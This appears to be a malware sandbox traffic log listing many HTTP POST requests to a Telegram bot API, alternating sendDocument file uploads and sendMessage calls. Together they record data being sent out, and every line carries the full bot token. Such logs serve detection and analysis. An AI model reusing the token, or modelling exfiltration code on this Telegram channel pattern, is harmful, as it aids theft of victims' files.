Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="1172cc76-886e-4909-b007-05327a1e3db2"Host: api.telegram.orgContent-Length: 7289Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="a2a81a33-080a-46c7-85c0-da3a6fe4db09"Host: api.telegram.orgContent-Length: 1341Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 257Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 185Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 347Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="4dba4b66-c6e2-482a-bf92-386954751bd6"Host: api.telegram.orgContent-Length: 20219Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="493bae27-baed-45ba-a431-666d1abb483a"Host: api.telegram.orgContent-Length: 1339Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="010c8553-179d-4067-9227-25f779196e7b"Host: api.telegram.orgContent-Length: 1685Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 257Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 189Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 347Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="294e053e-8942-432f-9378-79146a22301d"Host: api.telegram.orgContent-Length: 18070Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="56c8f7f5-07e0-40b7-a32b-83443e9ba68d"Host: api.telegram.orgContent-Length: 2055Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="5ffb5b01-7219-42ea-bcfc-b2424c6381eb"Host: api.telegram.orgContent-Length: 1830Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 257Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 188Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 347Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="3e961a6e-0a40-44ab-8080-b1959066e660"Host: api.telegram.orgContent-Length: 20252Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="5211d5fe-f499-4ae2-9bf7-44e5fd05c9d5"Host: api.telegram.orgContent-Length: 858Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="3c709e0c-c3a8-4ede-b2d1-29b411f16e03"Host: api.telegram.orgContent-Length: 2163Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 258Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 191Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 349Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="a76cf6c6-e263-40cf-9519-6a32bd4875cd"Host: api.telegram.orgContent-Length: 270320Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="69259242-5aff-4858-9012-5d6121312c19"Host: api.telegram.orgContent-Length: 1459Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="b6187d24-6b94-4391-966b-58c47c6686ae"Host: api.telegram.orgContent-Length: 5694Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 199Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="db91fe51-47b6-4538-b745-983cacefeb67"Host: api.telegram.orgContent-Length: 23689Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 349Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="97972ca2-3a11-4d1f-b3e4-7aab3f66cf38"Host: api.telegram.orgContent-Length: 2069Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 257Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="23df5747-e853-4484-8781-59e4497bb7ad"Host: api.telegram.orgContent-Length: 3237Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 203Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="6153a184-1705-47dc-a342-7d33276f0460"Host: api.telegram.orgContent-Length: 21070Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 350Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="d58a9397-78c7-47f1-b524-cd869a6a615e"Host: api.telegram.orgContent-Length: 3945Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 257Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="f989388b-1d51-4be8-8519-d5a9f1690fe8"Host: api.telegram.orgContent-Length: 12549Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 183Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="1fb52e84-5eac-46c8-8822-224616eaa930"Host: api.telegram.orgContent-Length: 10638Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 347Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="1b6802e2-281d-4a3a-9fad-3499b7ea5b33"Host: api.telegram.orgContent-Length: 2334Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 258Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="63a4d1ae-ce52-4116-9f1d-1d6acc816699"Host: api.telegram.orgContent-Length: 1874Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 207Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="fbe5c923-ed21-4db8-a822-fbb2407010e8"Host: api.telegram.orgContent-Length: 600025Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="44e30c7b-5b2a-43ab-81ab-fb4fca171edb"Host: api.telegram.orgContent-Length: 65268Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 347Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 241Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="450d2adc-5542-4edd-b4f8-1b35fd069840"Host: api.telegram.orgContent-Length: 2697Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="b63a9645-c24d-4da1-9bfd-d9260256b1fa"Host: api.telegram.orgContent-Length: 140637Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 199Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 347Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 258Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="59450b1b-8cf8-4a9d-b290-7eb34f5ec1fc"Host: api.telegram.orgContent-Length: 987Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="6fce76d9-0adf-4b0e-98c6-2800b20f329e"Host: api.telegram.orgContent-Length: 3312Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="41d44b8f-7b24-42e1-8a76-e8f6b80a1170"Host: api.telegram.orgContent-Length: 313542Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 251Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 347Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 258Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="7c02f42e-db9e-45df-912d-bade5ff55dc0"Host: api.telegram.orgContent-Length: 52064Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="ba951992-57b2-4f8b-a418-cf89eba89d53"Host: api.telegram.orgContent-Length: 4170Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="32b1706f-6542-42b1-8fab-42ac39adac32"Host: api.telegram.orgContent-Length: 130574Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 349Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 251Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 257Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="7ab0b122-2d0a-454c-9cd6-27f316b345b7"Host: api.telegram.orgContent-Length: 2251Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="7f5e282c-36db-45f4-92a4-ce4ac209ceb7"Host: api.telegram.orgContent-Length: 52104Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="64f452c2-59cc-48cb-9907-2fbcdbdb6917"Host: api.telegram.orgContent-Length: 30376Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 349Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 230Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 257Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="b6ac085b-b0e5-487e-b9f7-fafc3df76db9"Host: api.telegram.orgContent-Length: 1531Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="c4b3654f-6b19-4d85-9f54-8ddd111b40e6"Host: api.telegram.orgContent-Length: 10675Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="bf45d7d5-cdaa-4bf3-96de-598d21fd0bcb"Host: api.telegram.orgContent-Length: 79559Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 349Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 229Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 258Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="6317a6f4-f9a6-4639-b805-73f0b2836928"Host: api.telegram.orgContent-Length: 4359Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="adbbb210-efe3-4ce1-a332-776add664964"Host: api.telegram.orgContent-Length: 8060Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="a792a574-c062-4494-a9a0-0321e9c28bf8"Host: api.telegram.orgContent-Length: 332197Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 348Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 226Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="e00c1ca2-72ac-4840-9ced-6bd7ad730a7f"Host: api.telegram.orgContent-Length: 12617Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 257Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 347Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 240Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="7f7063b9-486e-4359-8822-8a223dc91761"Host: api.telegram.orgContent-Length: 11429Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="01cdfa1e-89f4-4d27-a799-97624c5d11c9"Host: api.telegram.orgContent-Length: 1464Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="dba1e0a7-3a5a-42f1-ae51-01bbdb95286f"Host: api.telegram.orgContent-Length: 26930Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 257Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 347Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="275f3aec-ca8f-4ace-88d4-794afa455f8a"Host: api.telegram.orgContent-Length: 21235Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 246Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="cdf1892d-44ac-4fbd-bfb5-688fedbe445c"Host: api.telegram.orgContent-Length: 1821Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 349Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="b7e61f92-a196-4212-b075-a2088c6c54ad"Host: api.telegram.orgContent-Length: 2326Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 349Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 246Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="02751a0b-43a0-4228-b250-5c660c3e58ca"Host: api.telegram.orgContent-Length: 1553Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="04dab5fe-5091-494a-add1-e55b3a57bacb"Host: api.telegram.orgContent-Length: 59057Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="1871a4ec-2cfd-4f86-a94b-62a3a4f2a9f1"Host: api.telegram.orgContent-Length: 44784Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 349Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 204Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 258Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="9fdd44d1-095a-4d58-b4c3-0c52decf4d65"Host: api.telegram.orgContent-Length: 4887Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="9efd76a0-7ba4-4af0-a6aa-28899ddd0f85"Host: api.telegram.orgContent-Length: 672Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="004aaa9b-31de-413b-be07-2538580bcce4"Host: api.telegram.orgContent-Length: 319894Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 348Expect: 100-continue
